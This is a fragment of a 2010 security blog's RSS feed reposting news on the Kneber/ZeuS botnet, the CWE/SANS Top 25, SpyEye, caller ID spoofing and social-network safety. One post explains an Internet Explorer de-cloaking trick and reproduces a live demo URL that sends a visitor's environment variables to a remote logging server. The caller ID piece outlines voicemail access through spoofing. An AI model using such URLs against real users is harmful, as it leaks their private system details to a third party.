<p>The virus, dubbed the Kneber botnet, is thought to be the brainchild of an Eastern European criminal group that is likely selling the information on the black market, according to the Internet security firm NetWitness, which uncovered the attacks in January.</p>
<p>The attacks are continuing and corporate losses are still being compiled, said NetWitness chief technology officer Tim Belcher.</p>
<p>The FBI, Department of State and Department of Homeland Security have been notified, Belcher said.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-515"></span></p>
<p>The crime groups &#8220;running this activity are every bit as expert at compromising systems and siphoning off information as nation states,&#8221; according to Belcher.</p>
<p>&#8220;They&#8217;re well funded, motivated and successful.&#8221; Hackers using the new virus have infiltrated the computer networks of more than 2,400 companies in almost 200 countries over an 18-month period, the Herndon, Va.-based computer security firm reported.</p>
<p>Further investigation revealed that many commercial and government systems were compromised, including 68,000 corporate login credentials and access to email systems, online banking sites, Yahoo, Hotmail and social networks such as Facebook.</p>
<p>Infiltrated companies include pharmaceutical giant Merck &amp; Co., Cardinal Health Inc., software firm Juniper Networks and Paramount Pictures, the Wall Street Journal reported Thursday.</p>
<p>Hackers reportedly used the virus to break into computers at 10 U.S. government agencies and in one case obtained the user name and password for a soldier&#8217;s military e-mail account.</p>
<p>Companies in Egypt, Mexico, Saudi Arabia, Turkey and the U.S. are the most frequently targeted in the attack, according to a research paper released by NetWitness.</p>
<p>The attack uses a piece of software called ZeuS, designed in Eastern Europe, that takes control of large numbers of computers.</p>
<p>ZeuS is among the top five most reported computer infections, according to the Department of Homeland Security.</p>
<p>&#8220;These large-scale compromises of enterprise networks have reached epidemic levels,&#8221; said Amit Yoran, CEO of NetWitness and former Director of the National Cyber Security Division.</p>
<p>&#8220;Cyber criminal elements like the Kneber crew quietly and diligently target and compromise thousands of government and commercial organizations across the globe.&#8221;</p>
<p>Yoran said that conventional intrusion detection systems are &#8220;inadequate for addressing Kneber or most other advanced threats.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/19/kneber-botnet-virus-attacks-75000-computers-worldwide/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>25 Most Dangerous Programming Errors list updated</title>
		<link>http://techblog.cyberphunkz.com/2010/02/19/25-most-dangerous-programming-errors-list-updated/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/19/25-most-dangerous-programming-errors-list-updated/#comments</comments>
		<pubDate>Fri, 19 Feb 2010 14:42:59 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Buildings]]></category>
		<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[laptop]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[programming errors]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=513</guid>
		<description><![CDATA[17 February 2010 http://www.h-online.com/security/news/item/Top-25-Programming-Errors-list-updated-933535.html Just as they did last year, over thirty international security organisations have come together, to publish a list of the 25 most dangerous programming errors leading to vulnerabilities that can be exploited for cybercrime and espionage. The 2010 CWE/SANS Top 25 MDPE (Most Dangerous Programming Errors) has been updated with a number &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/19/25-most-dangerous-programming-errors-list-updated/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>17 February 2010</p>
<p><a href="http://www.h-online.com/security/news/item/Top-25-Programming-Errors-list-updated-933535.html" target="_blank">http://www.h-online.com/security/news/item/Top-25-Programming-Errors-list-updated-933535.html</a></p>
<p>Just as they did last year, over thirty international security organisations have come together, to publish a list of the 25 most dangerous programming errors leading to vulnerabilities that can be exploited for cybercrime and espionage. The 2010 CWE/SANS Top 25 <strong>MDPE</strong> <strong>(Most Dangerous Programming Errors)</strong> has been updated with a number of improvements to how the errors are graded, prioritised and categorised. For example, new &#8220;Focus Profiles&#8221; allow readers to quickly see the listed errors sorted for particular professionals&#8217; interests.</p>
<p>A Category based view of the list sorts the errors into &#8220;Insecure Interaction&#8221;, covering various injection techniques, &#8220;Risky Resource Management&#8221;, covering buffer overflows or invalid calculations and &#8220;Porous Defenses&#8221;, which encompasses weaknesses in encryption or authentication. In the overall short list, the top problems were cross site scripting, SQL injection, classic buffer overflows, cross site request forgery and improper access control.</p>
<p>The idea behind the publication of the list is to make developers aware of the causes of many weaknesses and their ramifications in terms of overall security. The list also includes a section on &#8220;Monster Mitigations&#8221;, a set of practices which, if followed, can help address many of the Top 25 errors or reduce their severity.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-513"></span></p>
<p>Red Hat&#8217;s Mark Cox also published an analysis of programming errors Red Hat experienced in 2009. He noted that of the eleven flaws that have affected Red Hat Linux development, 5 were not in the top 25 but four of them were &#8220;on the cusp&#8221; having just missed inclusion in the CWE/SANS list. Cox says that &#8220;2009 was the year of the kernel NULL pointer dereference flaw&#8221; but that this flaw didn&#8217;t make it to the top 25 as, in 2010, the &#8220;Linux kernel and many vendors ship with protections to prevent kernel NULL pointers leading to privilege escalation&#8221;.</p>
<p>Organisations that contributed to the compilation of the list include, McAfee, Microsoft, Oracle and Symantec as well as organisations such as the Open Web Application Security Project (OWASP) and the Web Application Security Consortium (WASC).</p>
<p>The initiative is managed by Mitre and the SANS Institute . It receives funding from the US Homeland Security&#8217;s National Cyber Security Division and the NSA, who also contributed to compiling the list.</p>
<p>The List –</p>
<p><a href="http://cwe.mitre.org/top25/#Listing" target="_blank">http://cwe.mitre.org/top25/#Listing</a></p>
<table border="1" cellpadding="0" width="91%">
<tbody>
<tr>
<td><strong>Rank</strong></td>
<td><strong>Score</strong></td>
<td width="12%"><strong>ID</strong></td>
<td width="73%"><strong>Name</strong></td>
</tr>
<tr>
<td><strong>[1]</strong></td>
<td>346</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-79" target="_blank">CWE-79</a></td>
<td width="73%">Failure to Preserve Web Page Structure (&#8216;Cross-site Scripting&#8217;)</td>
</tr>
<tr>
<td><strong>[2]</strong></td>
<td>330</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-89" target="_blank">CWE-89</a></td>
<td width="73%">Improper Sanitization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
</tr>
<tr>
<td><strong>[3]</strong></td>
<td>273</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-120" target="_blank">CWE-120</a></td>
<td width="73%">Buffer Copy without Checking Size of Input (&#8216;Classic Buffer Overflow&#8217;)</td>
</tr>
<tr>
<td><strong>[4]</strong></td>
<td>261</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-352" target="_blank">CWE-352</a></td>
<td width="73%">Cross-Site Request Forgery (CSRF)</td>
</tr>
<tr>
<td><strong>[5]</strong></td>
<td>219</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-285" target="_blank">CWE-285</a></td>
<td width="73%">Improper Access Control (Authorization)</td>
</tr>
<tr>
<td><strong>[6]</strong></td>
<td>202</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-807" target="_blank">CWE-807</a></td>
<td width="73%">Reliance on Untrusted Inputs in a Security Decision</td>
</tr>
<tr>
<td><strong>[7]</strong></td>
<td>197</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-22" target="_blank">CWE-22</a></td>
<td width="73%">Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
</tr>
<tr>
<td><strong>[8]</strong></td>
<td>194</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-434" target="_blank">CWE-434</a></td>
<td width="73%">Unrestricted Upload of File with Dangerous Type</td>
</tr>
<tr>
<td><strong>[9]</strong></td>
<td>188</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-78" target="_blank">CWE-78</a></td>
<td width="73%">Improper Sanitization of Special Elements used in an OS Command (&#8216;OS Command Injection&#8217;)</td>
</tr>
<tr>
<td><strong>[10]</strong></td>
<td>188</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-311" target="_blank">CWE-311</a></td>
<td width="73%">Missing Encryption of Sensitive Data</td>
</tr>
<tr>
<td><strong>[11]</strong></td>
<td>176</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-798" target="_blank">CWE-798</a></td>
<td width="73%">Use of Hard-coded Credentials</td>
</tr>
<tr>
<td><strong>[12]</strong></td>
<td>158</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-805" target="_blank">CWE-805</a></td>
<td width="73%">Buffer Access with Incorrect Length Value</td>
</tr>
<tr>
<td><strong>[13]</strong></td>
<td>157</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-98" target="_blank">CWE-98</a></td>
<td width="73%">Improper Control of Filename for Include/Require Statement in PHP Program (&#8216;PHP File Inclusion&#8217;)</td>
</tr>
<tr>
<td><strong>[14]</strong></td>
<td>156</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-129" target="_blank">CWE-129</a></td>
<td width="73%">Improper Validation of Array Index</td>
</tr>
<tr>
<td><strong>[15]</strong></td>
<td>155</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-754" target="_blank">CWE-754</a></td>
<td width="73%">Improper Check for Unusual or Exceptional Conditions</td>
</tr>
<tr>
<td><strong>[16]</strong></td>
<td>154</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-209" target="_blank">CWE-209</a></td>
<td width="73%">Information Exposure Through an Error Message</td>
</tr>
<tr>
<td><strong>[17]</strong></td>
<td>154</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-190" target="_blank">CWE-190</a></td>
<td width="73%">Integer Overflow or Wraparound</td>
</tr>
<tr>
<td><strong>[18]</strong></td>
<td>153</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-131" target="_blank">CWE-131</a></td>
<td width="73%">Incorrect Calculation of Buffer Size</td>
</tr>
<tr>
<td><strong>[19]</strong></td>
<td>147</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-306" target="_blank">CWE-306</a></td>
<td width="73%">Missing Authentication for Critical Function</td>
</tr>
<tr>
<td><strong>[20]</strong></td>
<td>146</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-494" target="_blank">CWE-494</a></td>
<td width="73%">Download of Code Without Integrity Check</td>
</tr>
<tr>
<td><strong>[21]</strong></td>
<td>145</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-732" target="_blank">CWE-732</a></td>
<td width="73%">Incorrect Permission Assignment for Critical Resource</td>
</tr>
<tr>
<td><strong>[22]</strong></td>
<td>145</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-770" target="_blank">CWE-770</a></td>
<td width="73%">Allocation of Resources Without Limits or Throttling</td>
</tr>
<tr>
<td><strong>[23]</strong></td>
<td>142</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-601" target="_blank">CWE-601</a></td>
<td width="73%">URL Redirection to Untrusted Site (&#8216;Open Redirect&#8217;)</td>
</tr>
<tr>
<td><strong>[24]</strong></td>
<td>141</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-327" target="_blank">CWE-327</a></td>
<td width="73%">Use of a Broken or Risky Cryptographic Algorithm</td>
</tr>
<tr>
<td><strong>[25]</strong></td>
<td>138</td>
<td width="12%"><a href="http://cwe.mitre.org/top25/#CWE-362" target="_blank">CWE-362</a></td>
<td width="73%">Race Condition</td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/19/25-most-dangerous-programming-errors-list-updated/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>BOT-WAR : New Russian botnet tries to kill rival</title>
		<link>http://techblog.cyberphunkz.com/2010/02/18/bot-war-new-russian-botnet-tries-to-kill-rival/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/18/bot-war-new-russian-botnet-tries-to-kill-rival/#comments</comments>
		<pubDate>Thu, 18 Feb 2010 14:44:46 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[bot-war]]></category>
		<category><![CDATA[botnet]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=517</guid>
		<description><![CDATA[&#8216;Kill Zeus&#8217; removes rival software from PCs, giving Spy Eye access to usernames, passwords By Robert McMillan IDG News Service February 9, 2010 http://www.computerworld.com/s/article/9154618/New_Russian_botnet_tries_to_kill_rival IDG News Service &#8211; An upstart Trojan horse program has decided to take on its much-larger rival by stealing data and then removing the malicious program from infected computers. Security researchers &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/18/bot-war-new-russian-botnet-tries-to-kill-rival/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong><em>&#8216;Kill Zeus&#8217; removes rival software from PCs, giving Spy Eye access to usernames, passwords</em></strong></p>
<p>By Robert McMillan</p>
<p>IDG News Service</p>
<p>February 9, 2010</p>
<p><a href="http://www.computerworld.com/s/article/9154618/New_Russian_botnet_tries_to_kill_rival" target="_blank">http://www.computerworld.com/s/article/9154618/New_Russian_botnet_tries_to_kill_rival</a></p>
<p>IDG News Service &#8211; An upstart Trojan horse program has decided to take on its much-larger rival by stealing data and then removing the malicious program from infected computers.</p>
<p>Security researchers say that the relatively unknown [Spy Eye toolkit] added this functionality just a few days ago in a bid to displace its larger rival, known as Zeus.</p>
<p>The feature, called &#8220;Kill Zeus,&#8221; apparently removes the Zeus software from the victim&#8217;s PC, giving Spy Eye exclusive access to usernames and passwords.</p>
<p>Zeus and Spy Eye are both Trojan-making toolkits, designed to give criminals an easy way to set up their own &#8220;botnet&#8221; networks of password-stealing programs. These programs emerged as a major problem in 2009, with the U.S. Federal Bureau of Investigation estimating last October that they have caused $100 million in losses.</p>
<p>Trojans such as Zeus and Spy Eye steal online banking credentials. This information is then used to empty bank accounts by transferring funds to so-called money mules &#8212; U.S. residents with bank accounts &#8212; who then move the cash out of the country.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-517"></span></p>
<p>Sensing an opportunity, a number of similar Trojans have emerged recently, including Filon, Clod and [Bugat], which was discovered just last month.</p>
<p>Spy Eye popped up in Russian cybercrime forums in December, according to Symantec Senior Research Manager Ben Greenbaum.</p>
<p>With its &#8220;Kill Zeus&#8221; option, Spy Eye is the most aggressive crimeware, however. The software can also steal data as it is transferred back to a Zeus command-and-control server, said Kevin Stevens, a researcher with SecureWorks. &#8220;This author knows that Zeus has a pretty good market, and he&#8217;s looking to cut in,&#8221; he said.</p>
<p>Turf wars are nothing new to cybercriminals. Two years ago a malicious program called Storm Worm began attacking servers controlled by a rival known as Srizbi. And a few years before that, the authors of the Netsky worm programmed their software to remove rival programs Bagle and MyDoom.</p>
<p>Spy Eye sells for about $500 on the black market, about one-fifth the price of premium versions of Zeus. To date, it has not been spotted on many PCs, however.</p>
<p>Still, the Trojan is being developed quickly and has a growing list of features, Greenbaum said. It can, for example, steal cached password information that is automatically filled in by the browser, and back itself up via e-mail. &#8220;This is interesting in its potential, but it&#8217;s not currently a widespread threat at all,&#8221; he said.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/18/bot-war-new-russian-botnet-tries-to-kill-rival/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>De-cloaking in Internet Explorer</title>
		<link>http://techblog.cyberphunkz.com/2010/02/17/de-cloaking-in-internet-explorer/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/17/de-cloaking-in-internet-explorer/#comments</comments>
		<pubDate>Wed, 17 Feb 2010 11:37:33 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=510</guid>
		<description><![CDATA[I ran across a pretty interesting article on RSnake&#8217;s blog about using a URL to get users to disclose personal information. Here is the original article: http://ha.ckers.org/blog/20090810/de-cloaking-in-ie70-via-windows-variables/ I tested this in IE8 and the posting claims it works in IE6 and IE7 as well.  I tested in Firefox with and without NoScripts enabled and it &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/17/de-cloaking-in-internet-explorer/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<div>
<p>I ran across a pretty interesting article on RSnake&#8217;s blog about using a URL to get users to disclose personal information. Here is the original article:</p>
<p><a href="http://ha.ckers.org/blog/20090810/de-cloaking-in-ie70-via-windows-variables/">http://ha.ckers.org/blog/20090810/de-cloaking-in-ie70-via-windows-variables/</a></p>
<p>I tested this in IE8 and the posting claims it works in IE6 and IE7 as well.  I tested in Firefox with and without NoScripts enabled and it doesn&#8217;t work.  Yay Firefox!</p>
<p>What you can do is to embed text in a URL surrounded by the normal % % that will grab the actual value out of the system value and post it to the webserver.  Since the values post to the webserver, the people behind the webserver have the ability to view the values.  So, what types of information can be disclosed?  Anything that is contained within your Enviromental variables, for example.</p>
<p>RSnake put up a page that will allow you to try this out:  You will see that the appdata and Computer name should display in the resulting page.</p>
<p><a href="http://ha.ckers.org/log.cgi/rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz">http://ha.ckers.org/log.cgi/rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz</a></p>
<p>RSnake has asked that if anyone could get this URL to work without requiring a user to type it in their address bar.  Several posters commented that they tried embedding the URL in images, IFrames, etc and couldn&#8217;t do it.</p>
<p>Pretty interesting stuff.</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/17/de-cloaking-in-internet-explorer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Protect Your Social Network Identity</title>
		<link>http://techblog.cyberphunkz.com/2010/02/17/how-to-protect-your-social-network-identity/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/17/how-to-protect-your-social-network-identity/#comments</comments>
		<pubDate>Wed, 17 Feb 2010 10:35:40 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[social network]]></category>
		<category><![CDATA[social networking]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=507</guid>
		<description><![CDATA[Over a billion people visited social networking sites such as Facebook and Twitter last month so it’s not surprising that hackers have these sites in their cross-hairs. The attacks come in many forms: spreading Trojan viruses including key loggers, phishing for passwords and sniffing out packets of sensitive information. In fact, according to recent research &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/17/how-to-protect-your-social-network-identity/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Over a billion people visited social networking sites such as Facebook and Twitter last month so it’s not surprising that hackers have these sites in their cross-hairs.</p>
<p>The attacks come in many forms: spreading Trojan viruses including key loggers, phishing for passwords and sniffing out packets of sensitive information.</p>
<p>In fact, according to <a href="http://www.breach.com/news-events/press-releases/2009-08-17_social-network-attacks.html" target="_blank">recent  research</a> from Breach Security Labs, social networks were the most targeted category in 2009, accounting for 19% of all malicious attacks last year.</p>
<p>The media reports evidence of these attacks  seemingly every day.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-507"></span></p>
<p>For instance, in late January Twitter announced that they had once again fallen victim to hackers who were using torrent-based phishing attacks to steal usernames and passwords and hack into user accounts.</p>
<p>This is not the first time the popular  social network has been hacked.</p>
<p>In late 2009, some Twitter users fell victim to a phishing attack when they received email notifications from their “new followers,” with a link that lead them to a fake Twitter site where they were prompted to enter their usernames and passwords.</p>
<p>Facebook has had its share of malicious  attacks as well.</p>
<p>Most recently, in January there were widespread reports of users receiving direct messages from their “friends” within the network that included a link to a website that was suspected to infect the user’s computer with spyware.</p>
<p>Other widely reported incidents involve offers for a free iPod touch or gift cards, when in fact the only gift these unsuspecting users received was to have their usernames and passwords sold as part of a phishing list readily available for would-be cyber criminals to purchase online.</p>
<p>It’s no shock that these sites are  being targeted considering that the time American’s spent on social  networks <a href="http://blog.nielsen.com/nielsenwire/global/led-by-facebook-twitter-global-time-spent-on-social-media-sites-up-82-year-over-year/" target="_blank">increased  82% in 2009</a> from the previous  year, accounting for over 17% of the total time spent online. *</p>
<p>Many of the more prominent networks have  taken measures to increase security and privacy settings.</p>
<p>For example, Facebook has begun to closely monitor the number of postings from each account to detect abnormal behavior that can indicate an account has been compromised.</p>
<p>If a user who normally posts once or twice a day begins to send out hundreds of messages, the account is flagged within the system and attempts are made to contact the user and alert them to change their password and advise friends not click though on links from their recent postings.</p>
<p>In addition to setting robust social network passwords, setting personal reminders to change your passwords monthly and taking advantage of the privacy settings afforded by each individual network, consumers can also take advantage of simple and cost effective data encryption solutions designed to lock down your personal info and passwords.</p>
<p>The more advanced encryption software solutions available today enable the user to securely log into websites by using specialized tools like password managers that retain all of the data regarding each account in an encrypted vault or folder<em>.</em></p>
<p>The data entered into password managers is encrypted in case of theft or loss of the computer or USB flash drive it is stored on.</p>
<p>These types of password protection features are also capable of creating, storing and managing strong secure passwords so you can maintain unique IDs for each website, without having to remember them each time you log on to do online banking, surf social networks or check your email.</p>
<p>By utilizing tools like password managers, users eliminate the risk of exposing themselves when using computers that they do not own.</p>
<p>Finally, there is another very simple  tool that needs to be used when on any type of social networking site:  common sense.</p>
<p>Only put info on your walls, blogs, tweets or posts that you would feel comfortable with strangers knowing. For example, you may not want everyone to know when you will be out for the night.</p>
<p>This  opens a door for someone to be watching and break into your home knowing  you are not around.</p>
<p>Exercising some simple common sense in terms of what information is made public could have prevented many of the social network related horror stories we hear about every week.</p>
<p>With the rapid growth in social networking and the increasing instances cyber criminals targeting these online destinations, it’s imperative that we all understand the potential threats of identity theft and harm to our personal reputations.</p>
<p>By using simple data encryption and password protection tools, you can ensure that your personal information and online identities remain secure and private.</p>
<p><a href="http://blog.nielsen.com/nielsenwire/global/led-by-facebook-twitter-global-time-spent-on-social-media-sites-up-82-year-over-year/" target="_blank">Nielson Research Study</a></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/17/how-to-protect-your-social-network-identity/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Rise of Caller ID Spoofing</title>
		<link>http://techblog.cyberphunkz.com/2010/02/11/the-rise-of-caller-id-spoofing/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/11/the-rise-of-caller-id-spoofing/#comments</comments>
		<pubDate>Thu, 11 Feb 2010 07:32:24 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[caller id]]></category>
		<category><![CDATA[fraud]]></category>
		<category><![CDATA[spoofing]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=504</guid>
		<description><![CDATA[By Andy Jordan February 5, 2010 http://blogs.wsj.com/digits/2010/02/05/the-rise-of-caller-id-spoofing/ Applications that let users change or “spoof” their Caller ID are gaining in popularity in mobile phone app stores, even as Congress considers stalled legislation to outlaw particular uses of the technology, and criminals use it to engage in nefarious activity. Caller ID spoofing technology allows a user &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/02/11/the-rise-of-caller-id-spoofing/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>By Andy Jordan</p>
<p>February 5, 2010</p>
<p><a href="http://blogs.wsj.com/digits/2010/02/05/the-rise-of-caller-id-spoofing/" target="_blank">http://blogs.wsj.com/digits/2010/02/05/the-rise-of-caller-id-spoofing/</a></p>
<p>Applications that let users change or “spoof” their Caller ID are gaining in popularity in mobile phone app stores, even as Congress considers stalled legislation to outlaw particular uses of the technology, and criminals use it to engage in nefarious activity.</p>
<p>Caller ID spoofing technology allows a user to change the caller ID to show any desired number on a recipients caller ID display. There are currently a handful of companies that offer this service including SpoofCard (and it’s mobile application called Spoof App) and Spoofem, among others.</p>
<p>Most spoofing apps allow pranksters to mask or change their voice as well, and Spoofem actually allows users to fake texts and email. Popular desktop versions are now becoming available online in Blackberry and Droid app stores.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-504"></span></p>
<p>Spoofem and Spoofcard both claim over a million customers. “People use it as a lifestyle,” says Meir Cohen, President of TelTech Systems, SpoofCard’s parent company. Most services tend to charge $10 an hour. Spoofem’s President Gregory Evans claims more than a million dollars a year in profit.</p>
<p>There are useful and legitimate applications of the software: A doctor who has to call back a patient late at night and doesn’t want them to have his home or cell phone number, for instance; A public relations specialist calling on behalf a client, and wanting the client’s name to pop up on the Caller ID display.</p>
<p>And, of course, there is the cheating issue. Spoofem started marketing its product to women when it found, early on, that 80 percent of its users were women who were trying to catch their boyfriend or girlfriend cheating.</p>
<p>But the same spoofing software lets users hack into other people’s voicemail, by taking advantage of a feature in most mobile phone carriers that allows calls from a person’s own phone to default to voicemail without a password.</p>
<p>Spoofing companies blame the carriers for the security flaw. “It is not the service…. it’s the cell phone companies,” says Gregory Evans, President of Spoofem.com. “The cell phone companies have to take some type of responsibility.”</p>
<p>Some companies, such as T-Mobile have a default setting for voicemail that does not include a password.</p>
<p>“If the customer does not elect to turn the password on during setup, then the default setting is off,” says a spokesman for the company. “Individuals using these spoofing applications risk criminal as well as personal liability for their actions.”</p>
<p>AT&amp;T also does not default its users to a passcode for voicemail. “Our customers strongly prefer to have one touch voicemail,” a spokeswoman says. “However, we make it simple to set your voicemail settings to require a password and encourage customers to do so.”</p>
<p>Amy Storey, A spokeswoman for CTIA, the International Association for Wireless Telecommunications, which represents wireless carriers, believes Caller ID spoofing should be illegal and supports proposed lesiglation that would make certain uses of spoofing software illegal.</p>
<p>Spoofing companies are confident they will survive, in the same way email technology survived spamming, or similar phishing scams. Washington, D.C.-area based Telecom Attorney Mark Del Bianco, who also represents Spoofcard, says Congress cannot legislate against a technology. “They can’t make telling lies illegal,” he says.</p>
<p>Del Bianco recommends setting up and keeping a password prompt on mobile voicemail. “In the end, it’s the responsibility of anyone who has a voicemail box to make sure it’s not easy to hack into that voicemail box,” he says.</p>
<p>And for those thinking of committing a crime with the Caller ID spoofing software, Del Bianco has words of caution. “There are an awful lot of people who believe that if they use Caller ID spoofing, somehow there is no call record, and it can’t be traced. That’s not the case.” He says Spoof Card gets regular subpoena requests from unhappy spouses and the NSA, among others.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/02/11/the-rise-of-caller-id-spoofing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How Wi-Fi attackers are poisoning Web browsers</title>
		<link>http://techblog.cyberphunkz.com/2010/02/06/how-wi-fi-attackers-are-poisoning-web-browsers/</link>
		<comments>http://techblog.cyberphunkz.com/2010/02/06/how-wi-fi-attackers-are-poisoning-web-browsers/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 08:01:32 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
